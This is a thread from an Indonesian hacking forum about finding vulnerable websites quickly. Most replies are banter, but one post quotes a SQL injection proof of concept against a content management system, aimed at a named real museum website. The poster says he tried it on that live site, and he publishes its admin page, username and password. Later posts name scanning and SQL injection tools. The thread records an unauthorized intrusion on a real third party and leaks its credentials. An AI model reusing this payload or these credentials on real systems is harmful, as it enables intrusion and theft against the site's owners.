cara cari vlun web dgn cepat
Moderators: Paman, Xshadow, indounderground, NeOS-01
Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
- andryh4ever
- Posts: 181
- Joined: Tue Dec 15, 2009 3:08 pm
- Location: Kendawangan, Kab. Ketapang, Kalimantan Barat
- Contact:
Re: cara cari vlun web dgn cepat
:circle: :circle
Let's Join with us on http://www.borneocrew.org/
..::: Hanya Ing!n Menul!$ Apa Yang Ing!n Aku Tul!s :::..
[*] Visit me on http://pl4nkt0n767.blogspot.com [*]
[*] Visit me on http://spyc0dz.blogspot.com [*]
Re: cara cari vlun web dgn cepat
mantap semua deh.........!
- Nol Sembilan Tiga
- Posts: 141
- Joined: Wed Apr 07, 2010 1:19 pm
- Location: MaNad0
- Contact:
Re: cara cari vlun web dgn cepat
warxdoyo... :ngakak: :ngakak: :ngakak:
numpang post om/// ngakak lagi.....
keep share and "funky" om2... xixixixixiixi
numpang post om/// ngakak lagi.....
keep share and "funky" om2... xixixixixiixi
-==Hanya Ingin belajar dan belajar==-
Re: cara cari vlun web dgn cepat
Nol Sembilan Tiga wrote:warxdoyo... :ngakak: :ngakak: :ngakak:
numpang post om/// ngakak lagi.....
keep share and "funky" om2... xixixixixiixi
iah dehhhhhhh kk yang master,,, aku kan masi blajar maklum masi newbie :circle: :circle: :circle: :circle: :circle:
tapi aku akan slalu :tapa: :tapa: :tapa: :tapa: :tapa: :tapa: untuk bisa lebih bisa lagi dari yang lain
-
- Posts: 144
- Joined: Fri Apr 30, 2010 8:35 pm
Re: cara cari vlun web dgn cepat
dasar juga\\
hehehe ikutan nyambung aja nih om
sori ya
hehehe ikutan nyambung aja nih om
sori ya
i'm cyber_terror1st and i proud what i suppoust to be
Re: cara cari vlun web dgn cepat
nice share.. :tapa:
- Nol Sembilan Tiga
- Posts: 141
- Joined: Wed Apr 07, 2010 1:19 pm
- Location: MaNad0
- Contact:
Re: cara cari vlun web dgn cepat
xixixix.. gw suka ma warxdoyo keknya semangat skali... semangat trus ya om... kawan2 dsini bisa banyak membantu kok... kalo mo cari bugs banyak tanya2 ma om j0k3r.. :love: :love:
-==Hanya Ingin belajar dan belajar==-
- j0ck3r
- Posts: 331
- Joined: Wed Jun 02, 2010 4:51 pm
- Location: diantara kedamaian dunia underground
- Contact:
Re: cara cari vlun web dgn cepat
[quote="Nol Sembilan Tiga"]xixixix.. gw suka ma warxdoyo keknya semangat skali... semangat trus ya om... kawan2 dsini bisa banyak membantu kok... kalo mo cari bugs banyak tanya2 ma om j0k3r.. :love: :love:[/quote]
:malu: :malu: :malu: :malu:
:malu: :malu: :malu: :malu:
- darkslayer100
- Posts: 32
- Joined: Mon Jul 27, 2009 8:17 pm
Re: cara cari vlun web dgn cepat
mmhh.. mungkin klo boleh saya tambahkan. Salah satu cara cepat untuk menemukan web yg vulner adalah dengan melihat-lihat daftar bug di database web security seperti: securityreason.com , milw0rm, dll
misalnya,, mumpung saya baru buat thread yg agak nyambung nich.
ceritanya saya nggak tau nich mau narget apa dan siapa. Y udah saya pilih random target yg ada di securityreason.com
Lalu saya membaca2 exploit nya dan saya menemukan sesuatu yg menarik. :kaca: yaitu: SnowFlake Content Management System SQL Injection Arrow di yang bisa anda baca di http://securityreason.com/wlb_show/WLB-2010070111
berikut isinya:
hohoho.. tumben2an di kasih demo websitenya: :kaca:
OK.saya pun langsung mencoba dan. . . ,
ternyata website nya masih vulner
admin page: skimuseum.org/admin.php
user: admin
pass: nesm123
Waktu yg di butuhkan untuk mencari vuln web adalah 2-3 menit (hitungan waktu tidak menggabunggkan waktu untuk melakukan dumping database)
mohon maaf jika kurang membantu :maaf:
misalnya,, mumpung saya baru buat thread yg agak nyambung nich.
ceritanya saya nggak tau nich mau narget apa dan siapa. Y udah saya pilih random target yg ada di securityreason.com
Lalu saya membaca2 exploit nya dan saya menemukan sesuatu yg menarik. :kaca: yaitu: SnowFlake Content Management System SQL Injection Arrow di yang bisa anda baca di http://securityreason.com/wlb_show/WLB-2010070111
berikut isinya:
Code: Select all
SnowFlake - SQL Injection.txt
#################################################################
# Exploit Title: Powered by SnowFlake Content Management System SQL
Injection
#
# Date: 19th july 2010
#
# Author: Dinesh Arora
#
# Critical:high
#
# Affected / Tested Version : 1.0 beta5.2
#
# Sample Affected Parameter: uid
#
# contact: [email protected]
#
# Greetz to :b0nd, Fbih2s,Beenu,Charles ,j4ckh4x0r, punter,eberly
#
# Shoutz to : http://www.garage4hackers.com , www.beenuarora.com
#
# POC:
http://www.skimuseum.org/page.php?cid=galleries&uid=1+and+1=2+union+sel
ect+1,concat%28version%28%29,0x3a,database%28%29,0x3a,user%28%29%29,3,4,5,6
,7--
#
#
#################
OK.saya pun langsung mencoba dan. . . ,
ternyata website nya masih vulner
admin page: skimuseum.org/admin.php
user: admin
pass: nesm123
Waktu yg di butuhkan untuk mencari vuln web adalah 2-3 menit (hitungan waktu tidak menggabunggkan waktu untuk melakukan dumping database)
mohon maaf jika kurang membantu :maaf:
Re: cara cari vlun web dgn cepat
klo scan situs yg vulnerable pke nikto kk salah 1 tool yg sering di pke, klo schemafuzz stau saya bwt injector SQL Injection ja,, :putusasa: :putusasa: :putusasa:
CMIIW
CMIIW
::. Ikuti slalu kata hati .::